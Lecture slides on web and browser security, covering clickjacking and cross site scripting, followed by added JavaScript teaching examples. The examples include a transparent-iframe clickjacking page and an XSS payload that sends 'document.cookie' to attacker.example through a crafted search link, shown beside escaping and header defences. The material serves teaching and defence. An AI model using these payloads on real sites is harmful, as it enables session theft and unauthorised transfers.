Host and Application Security Lesson 20: How the Web Does not Work.

Post on 20-Jan-2016


Remind me…
- Precisely how does the web work?

Web Vulns
- This is host and application security, so we're focusing on the host issues

Simple
- Simple buffer overruns and other memory-safety vulnerabilities in the browser or in its plugins
- Determining the list of installed plugins is harder than it probably needs to be

Javascript
- Pretty powerful language
- History of different classes of vulnerabilities… perhaps the most famous is cross site scripting

Java Applets
- Tell me about Java Applets and their security model
- Isn't that good enough? Why? Why not?

ActiveX
- "Safe for scripting"?
- ActiveX: Pros and Cons?

Clickjacking
- A really neat exploit: get the user to click on one thing when they think they are clicking on another
- Example: a one-click bank transfer, where the bank's transfer button is loaded in an invisible frame positioned over a decoy the user wants to click
- Cross-frame issues make life very interesting
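The one-click bank transfer above, as an added example that is not part of the lecture: the page an attacker would serve (an invisible iframe holding the bank's transfer page stacked over a decoy button), and a small model of the decision a browser makes when it sees the bank's response headers, so you can check whether a given header set actually stops the framing. The origins (bank.example, evil.example, partner.example) and function names are hypothetical. The CSP parsing is simplified: it handles 'none', 'self', '*', and host sources with an optional scheme and a leading *. wildcard, not the full source-expression grammar.

```javascript
// Added example, not code from the lecture. Origins and names are hypothetical.

const BANK = 'https://bank.example';

// Attacker page: the real transfer button lives in a fully transparent iframe
// placed above a decoy button. The user sees "Claim your prize" but the click
// lands in the iframe, on whatever sits at that position inside the bank page.
function buildClickjackPage(targetUrl) {
  return `<!doctype html>
<html><body>
<button style="position:absolute;top:100px;left:100px;z-index:1">Claim your prize</button>
<iframe src="${targetUrl}"
  style="position:absolute;top:0;left:0;width:800px;height:600px;opacity:0;z-index:2"></iframe>
</body></html>`;
}

// Does one frame-ancestors source expression allow `origin` as an ancestor?
// selfOrigin is the origin of the framed document (here, the bank).
function matchesSource(src, origin, selfOrigin) {
  if (src === "'self'") return origin === selfOrigin;
  if (src === '*') return true;
  // host-source: [scheme://][*.]host[:port]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::(\d+))?$/i.exec(src);
  if (!m) return false;
  let u;
  try { u = new URL(origin); } catch { return false; }
  const [, scheme, wild, host, port] = m;
  if (scheme && scheme.toLowerCase() !== u.protocol.replace(':', '')) return false;
  if (port && port !== u.port) return false;
  const want = host.toLowerCase();
  return wild ? u.hostname.endsWith('.' + want) : u.hostname === want;
}

// Pull the frame-ancestors source list out of a CSP header value, or null.
function parseFrameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

// Model of the browser's decision. `headers` uses lowercase header names.
function framingAllowed(headers, topOrigin, selfOrigin) {
  const csp = headers['content-security-policy'];
  if (csp) {
    const sources = parseFrameAncestors(csp);
    if (sources) {
      // When frame-ancestors is present, browsers obey it and ignore X-Frame-Options.
      if (sources.length === 1 && sources[0] === "'none'") return false;
      return sources.some((s) => matchesSource(s, topOrigin, selfOrigin));
    }
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return topOrigin === selfOrigin;
  // Header missing, ALLOW-FROM (no longer honoured by current browsers), or
  // an unrecognised value: the page can be framed by anyone.
  return true;
}

// What the bank should send: both headers, so old and new browsers are covered.
function protectiveHeaders() {
  return {
    'x-frame-options': 'DENY',
    'content-security-policy': "frame-ancestors 'none'",
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('no headers, framed by evil.example:',
    framingAllowed({}, 'https://evil.example', BANK));
  console.log('protective headers, framed by evil.example:',
    framingAllowed(protectiveHeaders(), 'https://evil.example', BANK));
}
```

Run it against the real headers of a site you own (curl -I and feed the relevant values in) to see which of its pages are framable; a missing header is the common case, and X-Frame-Options: ALLOW-FROM is the common false sense of security.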

To Do
- Find and read the ACM Queue paper "Browser Security: Lessons from Google Chrome"
- Write a demonstration of a cross site scripting attack. Do this in essay form, showing the code you would have on both ends and how it would work. What is the future for XSS attacks?
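The cross site scripting attack named on the Javascript slide and in the assignment above, as an added example that is not the lecturer's code or model answer: a reflected XSS in a search page, with the vulnerable renderer, the hardened renderer, and the attacker's lure side by side. The hostnames (bank.example, attacker.example), the /search?q= route and the function names are hypothetical.

```javascript
// Added example, not code from the lecture. Hostnames and route are hypothetical.

// Server side, vulnerable: the untrusted query string is interpolated straight
// into the HTML body, so any markup in it is parsed as markup by the browser.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Escaping for the HTML text and attribute context. Output written into other
// contexts (a JavaScript string, a URL, CSS) needs that context's encoder.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Server side, hardened: the same page, with the query escaped at the point
// where it is written into HTML.
function renderSearchHardened(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Defence in depth the hardened server should also send: a CSP that refuses
// inline scripts, and a session cookie that script cannot read.
function hardenedResponseHeaders(sessionId) {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    'Set-Cookie': `session=${sessionId}; Secure; HttpOnly; SameSite=Lax`,
  };
}

// Attacker side: script that, once reflected, runs in the victim's browser
// under the bank's origin and sends the session cookie to the attacker's host.
const XSS_PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?'+encodeURIComponent(document.cookie)</script>";

// The lure: a link to the bank's own search page carrying the payload. The
// victim sees a bank URL; the browser sends the payload as the q parameter.
function buildAttackUrl(targetOrigin) {
  return `${targetOrigin}/search?q=${encodeURIComponent(XSS_PAYLOAD)}`;
}

// What the server receives after the browser follows the link.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q');
}

// Crude stand-in for the browser's HTML parser: is there a <script> start tag
// in the response body? Escaped output turns it into &lt;script&gt;, which is text.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Run the whole exchange: lure, request, response from each renderer.
function demo() {
  const q = queryFromUrl(buildAttackUrl('https://bank.example'));
  return {
    vulnerableExecutes: containsScriptTag(renderSearchVulnerable(q)),
    hardenedExecutes: containsScriptTag(renderSearchHardened(q)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildAttackUrl('https://bank.example'));
  console.log(demo());
}
```

The two renderers differ by one function call, which is the whole point: the fix is output encoding chosen for the context the data is written into, applied at the sink, and the headers only limit the damage when that is missed.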